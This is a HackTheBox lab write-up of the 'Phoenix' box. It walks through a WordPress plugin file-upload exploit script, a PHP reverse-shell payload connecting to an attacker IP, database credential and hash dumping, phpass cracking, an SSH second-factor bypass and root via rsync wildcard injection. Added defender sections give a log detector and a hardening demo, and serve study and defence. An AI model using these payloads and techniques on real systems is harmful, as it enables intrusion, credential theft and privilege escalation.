K4oS writeups

Phoenix – HackTheBox

K4oS 3 years ago

IP -> 10.10.11.149

We start off with an nmap scan

$ nmap -sCV -v -p- 10.10.11.149
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9d:f3:87:cd:34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
|   256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_  256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp open  ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Apache
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after:  2032-02-13T20:08:43
| MD5:   320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Alright! We have port 22 running SSH, port 80 running HTTP, and port 443 running HTTPS.

When we access the website we get redirected to https://phoenix.htb. So let’s add it to our /etc/hosts file.

10.10.11.149 phoenix.htb

And let’s refresh the page!

The robots.txt entry nmap found (/wp-admin/) tells us this site is running WordPress, so let’s run wpscan!

$ wpscan --url https://phoenix.htb/ -e p --plugins-detection mixed --disable-tls-checks
...
[+] accordion-slider-gallery
 | Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
 | Latest Version: 2.2
 | Last Updated: 2022-05-07T11:22:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] akismet
 | Location: https://phoenix.htb/wp-content/plugins/akismet/
 | Latest Version: 4.2.4
 | Last Updated: 2022-05-20T09:58:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://phoenix.htb/wp-content/plugins/akismet/, status: 500
 |
 | The version could not be determined.

[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12

[+] photo-gallery-builder
 | Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
 | Latest Version: 2.3
 | Last Updated: 2022-05-07T11:20:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] pie-register
 | Location: https://phoenix.htb/wp-content/plugins/pie-register/
 | Latest Version: 3.7.5.1
 | Last Updated: 2022-06-13T07:37:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] timeline-event-history
 | Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
 | Latest Version: 2.2
 | Last Updated: 2022-05-07T11:26:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.
.....

None of the listed plugins gives us an obvious way in.

After looking around I found a plugin that wpscan had not listed: “Download From Files” version 1.48. Its upload handler is reachable through admin-ajax.php without logging in and trusts the client’s list of allowed extensions, so anyone can upload a file that the web server will execute.
I will be using the following modified exploit from https://www.exploit-db.com/exploits/50287.
The only change is verify=False on the requests calls so that it accepts the box’s self-signed HTTPS certificate.

#!/usr/bin/env python3
# Download From Files <= 1.48 - Arbitrary File Upload (exploit-db 50287, by spacehen),
# with verify=False added so it works against a self-signed certificate.
import os
import sys

import requests


def print_banner():
	print("Download From Files <= 1.48 - Arbitrary File Upload")
	print("Author -> spacehen (www.github.com/spacehen)")


def print_usage():
	print("Usage: python3 exploit.py [target url] [php file]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
	# The unauthenticated AJAX handler answers with Hungarian status text
	# ("Sikeres" = successful) when the vulnerable plugin is installed.
	response = requests.get(uri, verify=False)
	return "Sikeres" in response.text


def main():
	print_banner()
	if len(sys.argv) != 3:
		print_usage()
		sys.exit(1)

	base = sys.argv[1].rstrip("/")
	file_path = sys.argv[2]

	ajax_action = "download_from_files_617_fileupload"
	uri = base + "/wp-admin/admin-ajax.php?action=" + ajax_action

	if not vuln_check(uri):
		print("(*) Target not vulnerable!")
		sys.exit(1)

	if not os.path.isfile(file_path):
		print("(*) Invalid file!")
		sys.exit(1)

	# The handler trusts the client-supplied allowExt and uploadDir, so we
	# declare .php4/.phtml acceptable and drop the file next to admin-ajax.php.
	data = {
		"allowExt": "php4,phtml",
		"filesName": "files",
		"maxSize": "1000",
		"uploadDir": ".",
	}
	print("Uploading Shell...")
	with open(file_path, "rb") as payload:
		files = {"files[]": payload}
		response = requests.post(uri, files=files, data=data, verify=False)

	file_name = os.path.basename(file_path)
	if "ok" in response.text:
		print("Shell Uploaded!")
		print(base + "/wp-admin/" + file_name)
	else:
		print("Shell Upload Failed")
		sys.exit(1)


if __name__ == "__main__":
	main()

Now we need a payload to upload. The exploit only whitelists php4 and phtml, and Apache’s PHP handler treats .phtml as PHP, so I created a file shell.phtml with the following contents:

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.53/1234 0>&1'"); ?>

Okay, let’s set up our netcat listener and run the script!

python3 50287.py https://phoenix.htb shell.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
Uploading Shell...
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/shell.phtml

And in our netcat session:

$ nc -lvnp 1234
Connection from 10.10.11.149:33478
wp_user@phoenix:~/wordpress/wp-admin$ id
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
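Looking at the same attack from the defender’s side: the AJAX action name and the /wp-admin/ landing directory come from the exploit above, so both are easy to spot in the web server’s access log. The following detector is an added example, not part of the original writeup; the Apache log lines it parses are constructed (client IPs, timestamps and user agents are made up), and it flags a client that got HTTP 200 on a POST to the upload action and then requested an executable file under /wp-admin/.

```python
import re
from urllib.parse import parse_qs, urlsplit

UPLOAD_ACTION = "download_from_files_617_fileupload"   # AJAX action used by the exploit
EXEC_EXTS = (".php", ".php4", ".php5", ".phtml", ".phar")

# Apache "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one client probes the action, uploads, then calls its
# shell; a second client is ordinary WordPress traffic.
SAMPLE_LOG = """\
10.10.14.53 - - [18/Jun/2022:14:30:01 +0000] "GET /wp-admin/admin-ajax.php?action=download_from_files_617_fileupload HTTP/1.1" 200 57 "-" "python-requests/2.28.0"
10.10.14.53 - - [18/Jun/2022:14:30:02 +0000] "POST /wp-admin/admin-ajax.php?action=download_from_files_617_fileupload HTTP/1.1" 200 12 "-" "python-requests/2.28.0"
10.10.14.53 - - [18/Jun/2022:14:30:09 +0000] "GET /wp-admin/shell.phtml HTTP/1.1" 200 0 "-" "curl/7.83.1"
10.10.14.20 - - [18/Jun/2022:14:31:00 +0000] "GET /?p=12 HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
10.10.14.20 - - [18/Jun/2022:14:31:05 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 30 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    return rec


def touched_upload_action(rec):
    return (rec["path"].endswith("/wp-admin/admin-ajax.php")
            and UPLOAD_ACTION in rec["query"].get("action", []))


def upload_then_exec(log_text):
    """Return (ip, path) for every executable file under /wp-admin/ requested by a
    client that earlier got HTTP 200 on a POST to the upload action. The exploit's
    default uploadDir '.' drops files beside admin-ajax.php, i.e. in /wp-admin/."""
    uploaders = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if touched_upload_action(rec):
            if rec["method"] == "POST" and rec["status"] == "200":
                uploaders.add(rec["ip"])
        elif (rec["ip"] in uploaders
              and rec["path"].startswith("/wp-admin/")
              and rec["path"].lower().endswith(EXEC_EXTS)):
            hits.append((rec["ip"], rec["path"]))
    return hits


def probing_clients(log_text):
    """Every client that hit the vulnerable action at all (GET probe or POST);
    worth flagging even when no upload succeeded."""
    recs = (parse_line(line) for line in log_text.splitlines())
    return sorted({r["ip"] for r in recs if r and touched_upload_action(r)})


if __name__ == "__main__":
    print("upload followed by execution:", upload_then_exec(SAMPLE_LOG))
    print("clients that touched the action:", probing_clients(SAMPLE_LOG))
```

The two-stage rule (successful POST, then a request for a PHP-type file in /wp-admin/) is what separates a real compromise from a scanner merely probing the action; probing_clients gives you the wider list to block or investigate.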

Now let’s run linpeas!

$ bash linpeas.sh
....SNIP..
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.149  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:e888  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:e888  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:e8:88  txqueuelen 1000  (Ethernet)
        RX packets 149972  bytes 16300516 (16.3 MB)
        RX errors 0  dropped 1041  overruns 0  frame 0
        TX packets 120100  bytes 36534553 (36.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=195<UP,BROADCAST,RUNNING,NOARP>  mtu 1500
        inet 10.11.12.13  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1976  bytes 204216 (204.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1976  bytes 204216 (204.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 
.........
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );
.........
╔══════════╣ Unexpected in root
/backups
.....

So we have two network adapters with different IP addresses, which we will investigate a bit later. We also have credentials for the WordPress database (the DB_USER/DB_PASSWORD defines from wp-config.php), and a /backups folder in the root of the filesystem which we will inspect later.

Let’s use those credentials from the wp_user shell to pull the usernames and password hashes from the MySQL database.

$ mysql -u wordpress -p
password: <++32%himself%FIRM%section%32++>

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2864
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use wordpress;
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| Phoenix    | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| john       | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| Jsmith     | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| Jane       | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| Jack       | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
| user1      | $P$BfVdS7OmYoUg3794foF0AH5Lh6Df2v0 |
+------------+------------------------------------+
6 rows in set (0.00 sec)

Inspecting /etc/passwd we find two other users with a login shell:

phoenix:x:1000:1000:Phoenix:/home/phoenix:/bin/bash
editor:x:1002:1002:John Smith,1,1,1,1:/home/editor:/bin/bash

Okay! The GECOS field of the editor account says John Smith, so I am guessing that this is Jsmith in WordPress.
Let’s crack the password! The hashes are phpass ($P$ prefix), which john recognises on its own. With Jsmith’s hash saved in a file named hashes:

$ john hashes --wordlist=rockyou.txt
Warning: detected hash type "phpass", but the string is also recognized as "PHPass-opencl"
Use the "--format=PHPass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:04:23 12.06% (ETA: 15:16:16) 0g/s 7253p/s 7253c/s 7253C/s cocacola#1..cobalt20
0g 0:00:06:36 18.39% (ETA: 15:15:47) 0g/s 7207p/s 7207c/s 7207C/s vonzti..vontee9
superphoenix     (Jsmith)
1g 0:00:08:04 DONE (2022-06-18 14:47) 0.002064g/s 7167p/s 7167c/s 7167C/s superphoenix..superorigina
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
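To see what john is actually doing with those $P$ hashes, here is the phpass scheme WordPress uses, written out in Python. This is an added example, not part of the original writeup: it recomputes a hash from its type, cost and salt (the first 12 characters), verifies a candidate, and runs a dictionary attack. The hash is Jsmith’s from the wp_users dump above; the mini-wordlist standing in for rockyou.txt is constructed.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
JSMITH_HASH = "$P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G."   # from the wp_users dump above


def _encode64(data, count):
    """phpass's own base64 variant (not RFC 4648): 6 bits at a time, low bits first."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def cost(stored):
    """Iteration count encoded in the 4th character: 'B' -> 2**13 = 8192 (what john printed)."""
    return 1 << ITOA64.index(stored[3])


def phpass_hash(password, setting):
    """Recompute a $P$ / $H$ hash from its first 12 characters (type, cost, 8-byte salt).
    Returns the 34-character string, or None if the setting is malformed."""
    if setting[:3] not in ("$P$", "$H$"):
        return None
    count_log2 = ITOA64.find(setting[3])
    if not 7 <= count_log2 <= 30:
        return None
    salt = setting[4:12]
    if len(salt) != 8:
        return None
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):          # the only thing slowing a cracker down
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password, stored):
    computed = phpass_hash(password, stored[:12])
    return computed is not None and hmac.compare_digest(computed, stored)


def crack(stored, candidates):
    """Offline dictionary attack: first candidate that verifies, else None."""
    for candidate in candidates:
        if phpass_verify(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    wordlist = ["phoenix", "password123", "superphoenix"]   # constructed stand-in for rockyou.txt
    print("cost:", cost(JSMITH_HASH))
    print("cracked:", crack(JSMITH_HASH, wordlist))
```

Each guess costs 8193 MD5 calls, which is why john managed only about 7,000 candidates per second per thread above; modern WordPress installs still default to this scheme, so a weak password in wp_users is cheap to recover once the database is readable.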

Great! Jsmith’s WordPress password is superphoenix, and if John Smith reuses it we also have credentials for the system user editor.

Let’s try and ssh in:

$ ssh editor@phoenix.htb

$$$$$$$\  $$\                                     $$\           
$$  __$$\ $$ |                                    \__|          
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  / 
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<  
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\ 
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
(editor@phoenix.htb) Password: superphoenix
(editor@phoenix.htb) Verification code:

A verification code? The password was accepted, but SSH is asking for a second factor that we don’t have. Let’s leave that for now and go back to the wp_user shell to look at the second network adapter, 10.11.12.13. It isn’t reachable from our attacking machine, so we check it from the box itself:

$ nc 10.11.12.13 22 -v
Connection to 10.11.12.13 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4

Okay! SSH is listening on that interface too. Let’s try connecting to this IP, still from the wp_user shell:

$ ssh editor@10.11.12.13

$$$$$$$\  $$\                                     $$\           
$$  __$$\ $$ |                                    \__|          
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  / 
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<  
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\ 
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: superphoenix

Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 18 Jun 2022 02:48:02 PM UTC

  System load:             0.0
  Usage of /:              69.7% of 4.36GB
  Memory usage:            27%
  Swap usage:              0%
  Processes:               269
  Users logged in:         1
  IPv4 address for ens160: 10.10.11.149
  IPv6 address for ens160: dead:beef::250:56ff:feb9:e888
  IPv4 address for eth0:   10.11.12.13


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Jun 18 14:12:36 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
968fa50dbd8b4d....

Great! We logged in: connecting through the internal 10.11.12.13 address, the verification-code prompt never appeared, so the second factor is only enforced for connections arriving from outside.

After a bit of time enumerating I found an odd file in /usr/local/bin named “cron.sh.x”. The .x suffix is what shc gives a shell script it has compiled into a binary, with the script stored encrypted inside it, so running strings didn’t get me anywhere. Instead I got pspy64 running and executed the file:

$ ./pspy64s
...SNIP...
#!/bin/sh

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"

cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* [email protected]:/backups/
...

It directly gave us the contents of the script! shc-compiled binaries hand the decrypted script to the shell on its command line, and pspy reads process command lines from /proc, so the “encryption” protects nothing once the binary runs.
Analysing it, the interesting line is the rsync call: *.* is unquoted, so the shell expands it into one argument per file in /backups before rsync sees anything. A file whose name starts with - is therefore parsed by rsync as an option, and rsync’s -e option is the command it runs as its remote shell. The job itself runs as root (mysqldump -u root, writing into /backups), so whatever we make rsync execute runs as root too.
Let’s go to /backups and create the two files that make this happen. Both names contain a dot so that *.* matches them, and the -- keeps touch from treating the first name as one of its own options:

$ cd /backups
$ touch -- "-e sh stuid.sh"
$ echo "chmod +s /bin/bash" > stuid.sh
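To see exactly what the cron job will do with those two files, here is an added example (not part of the original writeup) that builds a throwaway stand-in for /backups, asks /bin/sh to expand the glob the way cron.sh does, and runs the result through a cut-down model of rsync’s option parsing; rsync itself is never invoked. It also shows the hardened spelling, `rsync --ignore-existing -t -- ./*.* …`, which prevents the injection. The file names are constructed and the remote user in DEST is hypothetical (the script’s real destination user is not shown above).

```python
import os
import shutil
import subprocess
import tempfile

CRON_OPTIONS = ["--ignore-existing", "-t"]   # what the script passes before the glob
DEST = "user@10.11.12.13:/backups/"         # hypothetical remote user; the page obscures it


def make_backups_dir():
    """Constructed stand-in for /backups: one real backup, the helper script, and a
    file whose NAME is an rsync option followed by a command, as in the writeup."""
    d = tempfile.mkdtemp(prefix="backups-")
    open(os.path.join(d, "phoenix.htb.2022-06-18-14-00.tar.gz"), "w").close()
    with open(os.path.join(d, "stuid.sh"), "w") as f:
        f.write("chmod +s /bin/bash\n")
    open(os.path.join(d, "-e sh stuid.sh"), "w").close()
    return d


def cleanup(d):
    shutil.rmtree(d, ignore_errors=True)


def shell_expand(directory, words):
    """Let /bin/sh expand `words` unquoted inside `directory`, exactly as the cron
    script does, and return the resulting argument list one entry per argv slot."""
    script = 'cd "$1" && set -- ' + words + ' && printf \'%s\\n\' "$@"'
    result = subprocess.run(["/bin/sh", "-c", script, "sh", directory],
                            check=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def cron_argv(directory, hardened=False):
    """argv rsync receives from the cron job. The hardened spelling prefixes every
    match with ./ (so no match can start with -) and puts -- before the operands."""
    pattern = "-- ./*.*" if hardened else "*.*"
    return CRON_OPTIONS + shell_expand(directory, pattern) + [DEST]


def rsync_view(argv):
    """Cut-down model of rsync's option parsing: -e CMD / -eCMD / --rsh=CMD set the
    remote shell, -- ends options, anything else starting with - is an option we
    ignore. Returns (remote_shell_argv_or_None, operands)."""
    rsh, operands, i = None, [], 0
    while i < len(argv):
        a = argv[i]
        if a == "--":
            operands.extend(argv[i + 1:])
            break
        if a == "-e" and i + 1 < len(argv):      # "-e CMD" as two words
            rsh, i = argv[i + 1], i + 2
        elif a.startswith("-e"):                  # "-eCMD": value glued to the option
            rsh, i = a[2:], i + 1
        elif a.startswith("--rsh="):
            rsh, i = a[len("--rsh="):], i + 1
        elif a.startswith("-"):
            i += 1
        else:
            operands.append(a)
            i += 1
    # rsync splits the remote-shell string on whitespace, appends the host name and
    # its own --server arguments, and execs it: with the injected file name that is
    # `sh stuid.sh ...`, run as whoever owns the cron job (root here).
    return (rsh.split() if rsh else None), operands


if __name__ == "__main__":
    d = make_backups_dir()
    try:
        for hardened in (False, True):
            argv = cron_argv(d, hardened)
            print("hardened:" if hardened else "as in cron.sh:", argv)
            print("   remote shell, operands =", rsync_view(argv))
    finally:
        cleanup(d)
```

Quoting the glob would not help (there is no file literally named *.*); the fix is the ./ prefix, which guarantees every expanded name starts with a non-dash character, plus -- so rsync stops looking for options at all. The same pattern applies to tar, chown and any other tool fed an unquoted wildcard from a directory that untrusted users can write to.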

The cron job has to fire within 30 minutes of us creating the files, because the script’s find … -mmin +30 -delete line removes anything older than that. After waiting a bit we find that the setuid bit is set on /bin/bash (ls -l /bin/bash now shows an s in the permission bits).
Let’s run it with -p, which stops bash from dropping the effective uid back to ours:

$ /bin/bash -p
bash-5.0# id
uid=1002(editor) gid=1002(editor) euid=0(root) egid=0(root) groups=0(root),1002(editor)
bash-5.0# cat /root/root.txt
c9fb2e679b706ee31....

I hope you enjoyed the writeup as much as I enjoyed doing this box!